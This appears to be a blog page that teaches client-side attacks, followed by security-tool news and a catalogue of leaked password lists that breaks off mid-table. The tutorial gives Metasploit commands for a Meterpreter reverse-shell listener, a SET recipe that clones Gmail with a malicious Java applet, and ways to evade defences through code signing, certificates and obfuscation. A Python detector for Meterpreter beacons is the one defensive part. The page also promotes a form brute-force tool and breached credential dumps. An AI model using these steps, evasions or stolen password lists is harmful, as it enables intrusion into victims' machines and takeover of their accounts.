Client-side attacks are quite different. These are attacks that target vulnerabilities in client applications that interact with a malicious server or process malicious data. Here, the client initiates the connection that could result in an attack. If a client does not interact with a server, it is not at risk, because it doesn’t process any potentially harmful data sent from the server. 

A typical example of a client-side attack is a malicious web page targeting a specific browser vulnerability that, if the attack is successful, gives the malicious server complete control of the client system. Client-side attacks are not limited to the web setting; they can occur on any client/server pair, for example e-mail, FTP, instant messaging, multimedia streaming, etc.

Clients are only partly protected in environments where access from internal clients to servers on the Internet is restricted by traditional defenses like firewalls or proxies. A firewall, unless combined with other technologies such as IPS, only restricts network traffic; once the traffic is permitted, a client interacting with a server is at risk. More advanced corporate content-filtering solutions are available, but typically they protect only a limited set of client technologies.

Dropping the payload

There are various ways an attacker can drop her payload onto the targeted workstation or laptop; some of them are listed below:

Through clicking malicious links that lead to payloads hosted on a server controlled by the attacker.
Through vulnerable web servers, either by compromising them or by exploiting vulnerabilities on them.
Through Man In The Middle attacks.
Through phishing e-mails that also carry malicious payloads.
Through various other attacks that are out of the scope of this article.
The following image shows one of the most popular ways to "seduce" a user into clicking on a malicious web site:


Note: This is an old-fashioned attack approach, very well replicated by the penetration-testing community during attack simulations. Of course social engineering is also used throughout that process.

The actual attack, simplified

All you need to perform this type of attack is the Social-Engineer Toolkit (SET) and Metasploit. Well, not exactly: that is not true if you are going after high-profile targets. But first let's explain the simplified version of the attack. To perform a client-side attack against a user who is NOT protected by serious hardening, such as a reverse SSL proxy with content-inspection features and a firewall with proper egress filtering, the tools mentioned above will do the job. Using them, the following steps have to be taken:

Set up a listener bound to a public IP or DNS name.
Daemonize (background) the listener.
Research the victim's laptop software and hardware.
Social-engineer the user into downloading and executing the payload on her laptop.
Use proper payloads for post-exploitation of the victim.
Note: Again, this is a simplified attack sequence and is not going to work on a laptop or workstation that is hardened and where the user is not allowed to install software.

Setting up the listener

After we successfully generate the desired payload (which, by the way, I named ClickMe.exe) and verify that it is a valid executable file with the file command, we launch the handler on the attacker's machine by typing the following commands in the order given below:

cd /pentest/exploits/framework3
./msfconsole 
msf > use exploit/multi/handler
msf exploit(handler)> set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST publicIP
msf exploit(handler)> set LPORT 123
msf exploit(handler)> exploit -j

Note: The attacker's machine must be reachable somehow from the victim's machine (e.g. through a public static IP or DynDNS).

Generating the payload and setting up the clone

SET is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly become a standard tool in a penetration tester's arsenal. SET has a feature called “set-automate” which takes an answer file as input and enters the menu choices for you. So, for example, if I wanted to run the Java Applet attack I would create a file with the following text:

1
2
1

https://gmail.com no

Now let's name the file mySET.txt; the command that executes the Java applet attack would be:

root@bt:/pentest/exploits/set# ./set-automate mySET.txt 

Note: The described configuration launches the web-based attack from SET using the Java Applet attack method, embedding a malicious Java applet in a Gmail clone. SET will also launch the listener, but it is better if you do that manually.

After a successful compromise 

If the victim is properly social-engineered and executes the payload, the Meterpreter agent will connect back with a remote shell. The Meterpreter (short for Meta-Interpreter) payload gives the attacker an in-memory-only presence, reducing the attacker's need to touch disk to zero. Metasploit uploads a DLL (Meterpreter) to the remote host; the uploaded DLL is stored in the compromised process's heap. Once loaded, Meterpreter offers the attacker a plethora of options.

Once Meterpreter’s staged shellcode has been executed and Meterpreter has been loaded, communication begins. Meterpreter’s communication and extensibility are what make it so valuable to an advanced attacker. For the purposes of this article, think of the attacker as the client and the victim as the server. Meterpreter uses a protocol called Type-Length-Value (TLV).

Why the above methods won't work in a corporate environment

In a hardened corporate environment a set of prevention technologies protects the user workstations: antivirus software, endpoint security software with a personal firewall, e-mail gateways and anti-spam devices, web gateways performing deep content inspection of unencrypted connections, reverse SSL proxies that filter all SSL connections and validate the certificates presented, and finally IDS/IPS devices. On top of that:

Many advanced payloads do not work very well on x86-64 Windows.
Very restrictive inbound and outbound firewall rules.
Authentication is required for outgoing connections.
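What the content-inspecting web gateway mentioned above actually has to match, as an added example (not Metasploit's code): the stock Meterpreter reverse_http(s) stager sends a fixed default User-Agent, and its first request path is short random text chosen so that checksum8 (the sum of the bytes modulo 256) equals a constant that tells the handler which kind of stage to serve. The checksum constants are those of Metasploit's Rex::Payloads::Meterpreter::UriChecksum module; the User-Agent string is the default of that era and should be compared against your own handler before you rely on it; the proxy log format and the log lines are constructed for the demo.

```python
"""Why the stock Meterpreter reverse_http(s) stager is easy for a web gateway to
spot: its default User-Agent is a fixed string and its first request path is
random text chosen so that checksum8 (sum of bytes mod 256) equals a fixed
value that tells the handler what kind of stage to serve.  Added example, not
Metasploit's code.  The checksum constants are those of Metasploit's
Rex::Payloads::Meterpreter::UriChecksum module; the User-Agent string, the
log format and the log lines are constructed for the demo."""
import re
from urllib.parse import urlsplit

# checksum8 values the handler recognises (Rex::Payloads::Meterpreter::UriChecksum)
URI_CHECKSUM_INITW = 92   # Windows / native stage request
URI_CHECKSUM_INITP = 80   # Python stage
URI_CHECKSUM_INITJ = 88   # Java stage
URI_CHECKSUM_CONN = 98    # existing session reconnect
STAGER_CHECKSUMS = {URI_CHECKSUM_INITW: "windows-init", URI_CHECKSUM_INITP: "python-init",
                    URI_CHECKSUM_INITJ: "java-init", URI_CHECKSUM_CONN: "session-conn"}

# Default stager User-Agent of that era (assumption; compare to your handler).
KNOWN_AGENTS = {"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"}

# Stage request: 4-5 alphanumerics, optionally "_<session id>" for reconnects.
SHORT_RANDOM_PATH = re.compile(r"^[A-Za-z0-9]{4,5}(?:_[A-Za-z0-9]+)?$")

# Constructed proxy log format: ts client method url status "user-agent"
LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d+) "([^"]*)"$')


def checksum8(s: str) -> int:
    """Rex::Text.checksum8: sum of the bytes modulo 256."""
    return sum(s.encode("latin-1")) % 256


def first_segment(url: str) -> str:
    path = urlsplit(url).path.lstrip("/")
    return path.split("/", 1)[0]


def score_request(url: str, user_agent: str) -> list[str]:
    """Indicators that a request looks like a Meterpreter stager beacon."""
    reasons = []
    if user_agent in KNOWN_AGENTS:
        reasons.append("default stager User-Agent")
    seg = first_segment(url)
    if SHORT_RANDOM_PATH.match(seg):
        kind = STAGER_CHECKSUMS.get(checksum8(seg.split("_")[0]))
        if kind:
            reasons.append(f"checksum8 URI matches {kind} ({seg!r})")
    return reasons


def scan_log(lines: list[str]) -> list[tuple[str, str, list[str]]]:
    """Return (client, url, reasons) for lines with at least one indicator."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        _ts, client, _method, url, _status, ua = m.groups()
        reasons = score_request(url, ua)
        if reasons:
            hits.append((client, url, reasons))
    return hits


SAMPLE_LOG = [  # constructed, not real traffic
    '2012-10-24T09:01:02 10.0.0.5 GET http://203.0.113.10/AAmm 200 "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"',
    '2012-10-24T09:01:03 10.0.0.5 GET http://203.0.113.10/AAmm 200 "Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/16.0"',
    '2012-10-24T09:01:05 10.0.0.7 GET http://www.example.org/index.html 200 "Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/16.0"',
    '2012-10-24T09:01:06 10.0.0.9 GET http://203.0.113.10/AAmn 404 "Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/16.0"',
]

if __name__ == "__main__":
    for client, url, reasons in scan_log(SAMPLE_LOG):
        print(client, url, "; ".join(reasons))
```

A random 4-byte path hits any one checksum value with probability 1/256, so the URI test alone is noisy; it is the combination of a short random path, a matching checksum and a stager User-Agent (or, in the second sample line, a changed User-Agent with the checksum still intact) that a gateway rule should require. That is exactly why the bypass list that follows recommends a custom protocol rather than just a new User-Agent string.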
Bypassing defenses

There are numerous techniques for defeating the defenses mentioned above; some of them are:

A code-signing certificate for the payload (e.g. for the Meterpreter executable or the malicious Java applet).
An SSL certificate from a trustworthy Certificate Authority for the payload's communication channel.
A custom communication protocol instead of the one used by Meterpreter, since you don't want to be detected and blocked for mimicking the behavior of a well-known hacking tool. The Metasploit Meterpreter reverse_http(s) stager sends a fixed default User-Agent (set through its MeterpreterUserAgent option), which is easy to signature.
A custom payload, or your own evasion techniques added to an existing one; this way almost any signature-based detection can be bypassed.
Avoiding process DLL injection while delivering the payload. The latest versions of Windows enforce session separation, so some of the methods may not work on Windows 7/8.

Why code signing is not secure

Code signing can provide several valuable features. The most common use of code signing is to provide security when deploying; in some programming languages, it can also be used to help prevent namespace conflicts. Almost every code signing implementation will provide some sort of digital signature mechanism to verify the identity of the author or build system, and a checksum to verify that the object has not been modified. It can also be used to provide versioning information about an object or to store other meta data about an object.

Many code signing implementations provide a way to sign the code using a pair of keys, one public and one private, similar to the process employed by SSL or SSH. For example, in the case of .NET, the developer uses a private key to sign their libraries or executables each time they build. This key will be unique to a developer or group, or sometimes per application or object. The developer can either generate this key on their own or obtain one from a trusted certificate authority (CA). Of course it is not so difficult to sign malicious code: unauthorized digital certificates have been found that chain up to a Microsoft sub-certification authority issued under the Microsoft Root Authority and could be used to sign malicious code.

More specifically, components of the Flame malware were found to be signed with a certificate that chained up to the Microsoft Enforced Licensing Intermediate PCA certificate authority, and ultimately to the Microsoft Root Authority. This code-signing certificate came by way of the Terminal Server Licensing Service, which issues certificates to customers for ancillary PKI-based functions in their enterprise. Such a certificate could (before Microsoft's June 2012 update that moved those intermediate CAs to the Untrusted Certificates store) also allow attackers to sign code that validates as having been produced by Microsoft.

Why valid certificates are not secure

Obtaining a valid certificate and using it with SET is easy. That this is easy can be verified on numerous web sites reporting compromised certificates, one of them being:

http://www.ccssforum.org/malware-certificates.php
This is an extract from the web site, which carries a long list of compromised certificates: "The following is a list of digital certificates that have been reported by the forum as possibly being associated with malware to various certificate authorities. This information is intended to help prevent companies from using digital certificates to add legitimacy to malware and encourage prompt revocation of such certificates."

Obfuscating Meterpreter 

It is really easy to obfuscate Meterpreter: in the following post, http://spareclockcycles.org/tag/meterpreter/, the blog's owner explains that they managed to obfuscate Meterpreter by writing an XOR program in Python. The following extract is from the blog:

"What surprised me during all of this was how ridiculously easy it is to do just that. About 60 lines of Python (I know, way too many) and 20 lines of C was all it took to take my detection rate from 40% to 1% (32 bit version / 64 bit version). The Python code largely is just to automate things, but it also made the XOR crypting easier and allowed me to more easily embed arbitrary executables in my code (which is useful in embedding other, non-metasploit payloads)."

Epilogue

Dropping the payload is a very important part of a social-engineering attack. If you do all the other stages like a professional but use an average payload, you won't get the great results you expect. Client-side attacks and social engineering should be included in every penetration-testing engagement; if you are not testing for social-engineering attacks, a very significant attack vector that real hackers use will be skipped.



News from BackTrack and Wireshark

The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.
Building, testing and releasing a new BackTrack revision is never an easy task. Keeping up-to-date with all the latest tools, while balancing their requirements of dependencies, is akin to a magic show juggling act. Thankfully, active members of our redmine community such as backtracklover and JudasIscariot make our task that much easier by actively reporting bugs and suggesting new tools on a regular basis. Hats off to the both of you.
We would like to thank Offensive Security for providing the BackTrack dev team with the funding and resources to make all of this happen. Also, a very special thanks to dookie, our lead developer – for building, testing and packaging most of the new tools in this release.
Together with our usual KDE and GNOME, 32/64 bit ISOs, we have released a single VMware Image (Gnome, 32 bit). For those requiring other VM flavors of BackTrack – building your own VMWare image is easy – instructions can be found in the BackTrack Wiki.
Lastly, if you’re looking for intensive, real world, hands on Penetration Testing Training – make sure to drop by Offensive Security Training, and learn the meaning of “TRY HARDER”.
For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. Direct ISO downloads will be available once all our HTTP mirrors have synched, which should take a couple more hours. Once this happens, we will update our BackTrack Download page with all links.

Get Wireshark

The current stable release of Wireshark is 1.8.2. It supersedes all previous releases, including all releases of Ethereal. You can also download the latest development release (1.8.0rc2) and documentation.

FireForce - a Firefox form brute-force attack tool

Nice tool for hacking admin-access web portals and other web forms.
Guess passwords either with a dictionary or a brute-force attack.
You can use the password lists from my previous post
or from here.
 
Get the addon here

Mega password list collection for your dictionary brute-force audit



Lists including the latest hacked-site password lists, like rockyou.com, LinkedIn, etc.,
all in this wiki:


Name | Compressed | Uncompressed | Date | Notes
---- | ---------- | ------------ | ---- | -----
Rockyou | rockyou.txt.bz2 (60,498,886 bytes) | n/a | 2009-12 | Best list available; huge, stolen unencrypted
Rockyou with count | rockyou-withcount.txt.bz2 (59,500,255 bytes) | n/a | |
phpbb | phpbb.txt.bz2 (868,606 bytes) | n/a | 2009-01 | Ordered by commonness. Cracked from md5 by Brandon Enright (97%+ coverage)
phpbb with count | phpbb-withcount.txt.bz2 (872,867 bytes) | n/a | |
phpbb with md5 | phpbb-withmd5.txt.bz2 (4,117,887 bytes) | n/a | |
MySpace | myspace.txt.bz2 (175,970 bytes) | n/a | 2006-10 | Captured via phishing
MySpace - with count | myspace-withcount.txt.bz2 (179,929 bytes) | n/a | |
Hotmail | hotmail.txt.bz2 (47,195 bytes) | n/a | Unknown | Isn't clearly understood how these were stolen
Hotmail with count | hotmail-withcount.txt.bz2 (47,975 bytes) | n/a | |
Faithwriters | faithwriters.txt.bz2 (39,327 bytes) | n/a | 2009-03 | Religious passwords
Faithwriters - with count | faithwriters-withcount.txt.bz2 (40,233 bytes) | n/a | |
Elitehacker | elitehacker.txt.bz2 (3,690 bytes) | n/a | 2009-07 | Part of zf05.txt
Elitehacker - with count | elitehacker-withcount.txt.bz2 (3,846 bytes) | n/a | |
Hak5 | hak5.txt.bz2 (16,490 bytes) | n/a | 2009-07 | Part of zf05.txt
Hak5 - with count | hak5-withcount.txt.bz2 (16,947 bytes) | n/a | |
Älypää | alypaa.txt.bz2 (5,178 bytes) | n/a | 2010-03 | Finnish passwords
alypaa - with count | alypaa-withcount.txt.bz2 (6,013 bytes) | n/a | |
Facebook (Pastebay) | facebook-pastebay.txt.bz2 (375 bytes) | n/a | 2010-04 | Found on Pastebay; appear to be malware-stolen.
Facebook (Pastebay) - w/ count | facebook-pastebay-withcount.txt.bz2 (407 bytes) | n/a | |
Unknown porn site | porn-unknown.txt.bz2 (30,600 bytes) | n/a | 2010-08 | Found on angelfire.com. No clue where they originated, but clearly porn site.
Unknown porn site - w/ count | porn-unknown-withcount.txt.bz2 (31,899 bytes) | n/a | |
Ultimate Strip Club List | tuscl.txt.bz2 (176,291 bytes) | n/a | 2010-09 | Thanks to Mark Baggett for finding!
Ultimate Strip Club List - w/ count | tuscl-withcount.txt.bz2 (182,441 bytes) | n/a | |
[Facebook Phished] | facebook-phished.txt.bz2 (14,457 bytes) | n/a | 2010-09 | Thanks to Andrew Orr for reporting
Facebook Phished - w/ count | facebook-phished-withcount.txt.bz2 (14,941 bytes) | n/a | |
Carders.cc | carders.cc.txt.bz2 (8,936 bytes) | n/a | 2010-05 |
Carders.cc - w/ count | carders.cc-withcount.txt.bz2 (9,774 bytes) | n/a | |
Singles.org | singles.org.txt.bz2 (50,697 bytes) | n/a | 2010-10 |
Singles.org - w/ count | singles.org-withcount.txt.bz2 (52,884 bytes) | n/a | |
Unnamed financial site | (reserved) | (reserved) | 2010-12 |
Unnamed financial site - w/ count | (reserved) | (reserved) | |
Gawker | (reserved) | (reserved) | 2010-12 |
Gawker - w/ count | (reserved) | (reserved) | |
Free-Hack.com | (reserved) | (reserved) | 2010-12 |
Free-Hack.com w/count | (reserved) | (reserved) | |
Carders.cc (second time hacked) | (reserved) | (reserved) | 2010-12 |
Carders.cc w/count (second time hacked) | (reserved